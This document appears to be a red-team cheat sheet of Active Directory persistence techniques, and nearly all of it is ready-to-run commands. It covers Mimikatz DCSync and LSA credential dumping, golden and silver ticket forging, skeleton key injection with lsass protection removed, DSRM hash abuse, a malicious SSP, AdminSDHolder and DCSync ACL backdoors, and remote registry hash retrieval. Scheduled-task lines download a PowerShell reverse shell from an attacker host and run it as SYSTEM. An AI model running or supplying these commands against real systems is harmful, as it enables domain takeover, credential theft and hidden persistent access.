Persistence

DCSync feature for getting krbtgt hash

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

ACCOUNT DUMPING

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01

GOLDEN TICKET

:information_source: On any machine

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lab.domain.local /sid:S-1-5-x-x-x-x /krbtgt:00000000000000000000000000000000 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Execute a task to run the reverse shell script
schtasks /create /S machine.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "taskname" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://attackerip/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S machine.domain.local /TN "taskname"

Golden ticket parameters | Invoke-Mimikatz -Command | Resume | |---|---| | kerberos::golden | Name of the module | | /User:Administrator | Username for which the TGT is generated | | /domain:lab.domain.local | Domain FQDN | | /sid:S-1-5-x-x-x-x | SID of the domain | | /krbtgt:00000000000000000000000000000000 | NTLM (RC4) hash of the krbtgt account. Use /aes128 and /aes256 for using AES keys | | /id:500 /groups:512 | Optional User RID (default 500) and Group default 513 512 520 518 519) | | /ptt or /ticket | Injects the ticket in current PowerShell process - no need to save the ticket on disk - Saves the ticket to a file for later use | | /startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future | | /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes | | /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800 |

SILVER TICKET

Using hash of the Domain Controller computer account

Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.domain.local /service:CIFS /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Generate Silver ticket with machine account Hash - WMI abuse
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:HOST/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:target.local /sid:S-1-5-x-x-x-x /target:machine.target.local /service:RPCSS/rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# Check WMI
Get-WmiObject -Class win32_operatingsystem -ComputerName machine.target.local

Silver ticket parameters | Invoke-Mimikatz -Command | Resume | |---|---| | kerberos::golden | Name of the module (there is no Silver module!) | | /User:Administrator | Username for which the TGT is generated | | /domain:lab.domain.local | Domain FQDN | | /sid:S-1-5-x-x-x-x | SID of the domain | | /target:DC01.lab.domain.local | Target server FQDN | | /service:cifs | The SPN name of service for which TGS is to be created | | /rc4:00000000000000000000000000000000 | NTLM (RC4) hash of the service account. Use /aes128 and /aes256 for using AES keys | | /id:500 /groups:512 | Optional User RID (default 500) and Group (default 513 512 520 518 519) | | /ptt | Injects the ticket in current PowerShell process - no need to save the ticket on disk | | /startoffset:0 | Optional when the ticket is available (default 0 - right now) in minutes. Use negative for a ticket available from past and a larger number for future | | /endin:600 | Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes | | /renewmax:10080 | Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800 |

Create a silver ticket for the HOST SPN which will allow us to schedule a task

Invoke-Mimikatz -Command '"kerberos::golden /domain:lab.domain.local /sid:S-1-5-x-x-x-x /target:DC01.lab.dmoain.local /service:HOST /rc4:00000000000000000000000000000000 /user:Administrator /ptt"'
# CONFIGURE REMOTE TASK
schtasks /create /S DC01.lab.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Abuse01" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10/Invoke-PowerShellTcp.ps1''')'"
# EXEC REMOTE TASK
schtasks /Run /S DC01.lab.domain.local /TN "Abuse01"

SKELETON KEY

# REMOTE
$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
# BYPASS AMSI AND EXIT
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
# OR
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01.lab.dmoain.local
# LOGIN
Enter-PSSession -Computername DC01 -credential domain\Administrator
# PASSWORD mimikatz

- Skeleton Key with lsass running as a protected process

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

:information_source: needs the mimikatz driver (mimidriv.sys) on disk of the target DC

DSRM

Dump DSRM password (needs DA privs)

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername DC01

Eneable DSRM account to login

Enter-PSSession -Computername DC01
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Pass the DSRM hash

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:DC01 /user:Administrator
/ntlm:00000000000000000000000000000000 /run:powershell.exe"

Dump local acconut

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername DC01

FULL

$sess = New-PSSession DC01.domain.local
Enter-PSSession -Session $sess
# BYPASS AMSI AND EXIT
Invoke-Command -FilePath C:\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

# ALLOW DSRM ADMINISTRATOR TO LOGIN
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# PASS THE HASH DSRM ADMINISTRATOR
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:DC01 /user:Administrator /ntlm:00000000000000000000000000000000 /run:powershell.exe"'

Security Support Provider (SSP)

# Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

Invoke-Mimikatz -Command '"misc::memssp"'
# CHECK C:\Windows\system32\kiwissp.log

ADMINSDHOLDER

Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL

Protected Groups
Account Operators	Enterprise Admins
Backup Operators	Domain Controllers
Server Operators	Read-only Domain Controllers
Print Operators	Schema Admins
Domain Admins	Administrators
Replicator

Well known abuse

Groups	Resume
Account Operators	Cannot modify DA/EA/BA groups. Can modify nested group within
Backup Operators	Backup GPO, edit to add SID of controlled account to a privileged group and Restore
Server Operators	Run a command as system (using the disabled Browser service)
Print Operators	Copy ntds.dit backup, load device drivers

Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights All -Verbose

Using ActiveDirectory Module and Set-ADACL

Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=test,DC=domain,DC=local' -Principal attacker -Verbose

Interesting permissions (ResetPassword, WriteMembers)

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights ResetPassword -Verbose
#
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName attacker -Rights WriteMembers -Verbose

Run SDProp manually

Import-Module Invoke-SDPropagator.ps1
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

Check the Domain Admins permission

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'attacker'}
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=lab,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'attacker'}

Abusing FullControl using PowerView_dev

Add-DomainGroupMember -Identity 'Domain Admins' -Members attackerda -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members attackerda

Abusing ResetPassword using PowerView_dev

Set-DomainUserPassword -Identity targetaccount -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
Set-ADAccountPassword -Identity targetaccount -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

CHECK REPLICATION RIGHTS, MODIFY, DCSYNC ATTACK

# CHECK
. .\PowerView.ps1
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.IdentityReference -match "targetuser") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

# ADD OBJECT ACL
Add-ObjectAcl -TargetDistinguishedName "dc=domain,dc=local" -PrincipalSamAccountName targetuser -Rights DCSync -Verbose

# DCSYNC
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.IdentityReference -match "targetuser") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

Rights Abuse

Add FullControl rights

Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' -PrincipalSamAccountName john -Rights All -Verbose

Using ActiveDirectory Module and Set-ADACL

Set-ADACL -DistinguishedName 'DC=lab,DC=domain,DC=local' -Principal john -Verbose

Add rights for DCSync

Add-ObjectAcl -TargetDistinguishedName 'DC=lab,DC=domain,DC=local' -PrincipalSamAccountName bob -Rights DCSync -Verbose

Using ActiveDirectory Module and Set-ADACL

Set-ADACL -DistinguishedName 'DC=lab,DC=domain,DC=local' -Principal bob -GUIDRight DCSync -Verbose

Execute DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

SECURITY DESCRIPTORS

ACLs can be modified to allow non-admin users access to securable objects

WMI

On local machine for jane
```
Set-RemoteWMI -UserName jane -Verbose
```

On remote machine for jane without explicit credentials

Set-RemoteWMI -UserName jame -ComputerName DC01 -namespace 'root\cimv2' -Verbose

On remote machine with explicit credentials

Set-RemoteWMI -UserName jane -ComputerName DC01 -Credential Administrator -namespace 'root\cimv2' -Verbose

On remote machine remove permissions

Set-RemoteWMI -UserName jane -ComputerName DC01 -namespace 'root\cimv2' -Remove -Verbose

PSREMOTE

On local machine for joe

Set-RemotePSRemoting -UserName joe -Verbose

On remote machine for joe without credentials

Set-RemotePSRemoting -UserName joe -ComputerName DC01 -Verbose

On remote machine, remove the permissions

Set-RemotePSRemoting -UserName joe -ComputerName DC01 -Remove

REMOTE REGISTRY

Using DAMP, with admin privs on remote machine

Add-RemoteRegBackdoor -ComputerName DC01 -Trustee jack -Verbose

As jack, retrieve machine account hash

Get-RemoteMachineAccountHash -ComputerName DC01 -Verbose

Retrieve local account hash

Get-RemoteLocalAccountHash -ComputerName DC01 -Verbose

Retrieve domain cached credentials

Get-RemoteCachedCredential -ComputerName DC01 -Verbose